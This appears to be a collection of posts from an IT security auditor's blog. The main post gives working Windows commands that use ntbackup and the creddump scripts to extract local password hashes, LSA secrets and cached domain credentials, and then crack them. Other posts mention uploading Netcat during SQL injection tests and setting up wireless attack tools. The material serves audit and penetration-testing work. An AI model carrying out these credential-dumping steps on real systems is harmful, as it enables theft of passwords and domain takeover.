NTBACKUP: more than DR/BCP (Updated)

An auditor’s interest in the Windows NTBACKUP Utility extends beyond examining their DR/BCP plan.

Suppose you just got command prompt access to a server (example tutorial 1, 2, & 3) but the host has anti-virus installed and you can’t disable it. You can’t use your trusty pwdump2 to dump the local password hashes (the same utility that SQLAT and SQLNINJA use). No problem, just use the ntbackup utility to make a current backup of the registry (including SAM and SYSTEM keys).

C:\>ntbackup backup systemstate /j "Auditor Owns Your Hashes" /f "%systemroot%\temp\%Username%SysState.bkf" /a
C:\>del "c:%systemroot%\temp\%Username%SysState.bkf"

You don’t need the backup file you created so it can be deleted (C:\>del %systemroot%\temp\%Username%SysState.bkf). When a backup is done of the systemstate the files in the %systemroot%\repair folder are updated. Copy the sam, system, and security files from %systemroot%\repair.

Once those files are obtained you can use the command line utilities from the creddump project to produce the same files obtained form PWDumpX (see tuturial).

Python needs to be installed for creddump to work.

Python version 2.5.4 from http://www.python.org/download/releases/2.5.4/
Pycrypto version 2.0.1 from http://jintoreedwine.com/files_and_stuff/pycrypto-2-0-1.zip

C:\creddump-0.1>pwdump.py SYSTEM SAM >> PWHashes.txt
C:\creddump-0.1>lsadump.py SYSTEM SECURITY >> LSASecrets.txt
C:\creddump-0.1>cachedump.py SYSTEM SECURITY >> PWCache.txt

Using RainbowCrack and the rainbowtables obtained from The Schmoo Group you will be able to obtain the passwords to any local account with a password 14 characters or less from PWHashes.txt.

See this tuturial on how to dictionary attack the passwords obtained from the PWCache.txt file.

You can review the LSASecrets.txt file to obtain plain text passwords for Windows service accounts. Often these accounts are also Domain accounts with the same password or even Domain Administrator accounts.

Updated Configuration Tutorial

I have created an updated configuration document for my Motion Computing m1300 wireless tablet. This document details getting Ubuntu 8.04 LTS Hardy Heron up and running on the tablet. Included in the documentation are the steps to get Kismet, Aircrack-ng, and Karmasploit up and running. Those steps will be helpful no matter what hardware you install Ubuntu on.

I have also created an updated configuration document for the setup of my Linux laptop that I use for penetration testing.

Auditing Folder (and subfolder) Permissions using CACLS

Updated 7/2/2016 – yeah, I haven’t needed to parse the shitty output from this tool in 7 years. I never accounted for “special access” permissions not including the account with the access.
Updated 12/28/2018 – link to the code didn’t work so I’ve fixed that. Also updated if you receive a specific error message.

CACLS.exe is a great builtin Windows utility that allows you to list the permissions on a file or folder.  This command has been used in an audit to get the permissions of the folders on an agency file server that served the “private” shares to each Domain user.  The findings we would be looking for when examining the results are improper access to the “private” shares by other Domain users.

For CACLS options and how to interpret the results see this site.
Read More

Penetration Testing Ninjitsu

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans).  I highly recommend listening to these web casts and downloading the slides for your reference.  I’m including the commands extracted from the slides that can be very useful for a penetration test.

NOTE: 12/2018 – Link to the webcast no longer works. The Internet Archive has the slides as a PDF. I’ve downloaded it and host it here as well.
Read More

Setup TFTP

A TFTP Server for in Information Systems Auditor is an important tool. It has come in handy in a couple situations during an audit. The two that come to mind are retrieving Cisco configuration files and uploading Netcat during a SQL audit or SQL Injection test. This is a quick post on how I like to setup my tftp server on Linux and Windows.

My Linux distro of choice is Ubuntu.

$sudo -s
#apt-get install atftpd
#atftpd --daemon

That will get you started on Linux. The TFTP directory will be /srv/tftp. For Windows I like the free tftp server you get from www.solarwinds.com. Download and install.  Create the directory C:\TFTP-Root.

Hello Auditors!

Welcome to jedge.com.  I’m James Edge the host of this site.  My goal for this site is to create a colaborative portal for documents, links, and thoughts regarding auditing Information System security at a state goverment level.  I’ve been working in state government for a few years with both New York and Georgia state and I hope to express my thoughts and opinions related to auditing with what I’ve experienced working for those governments.  Enjoy the site and feel free to post a comment for whatever reason.  I hope the feedback I receive will further improve the site.  Thanks.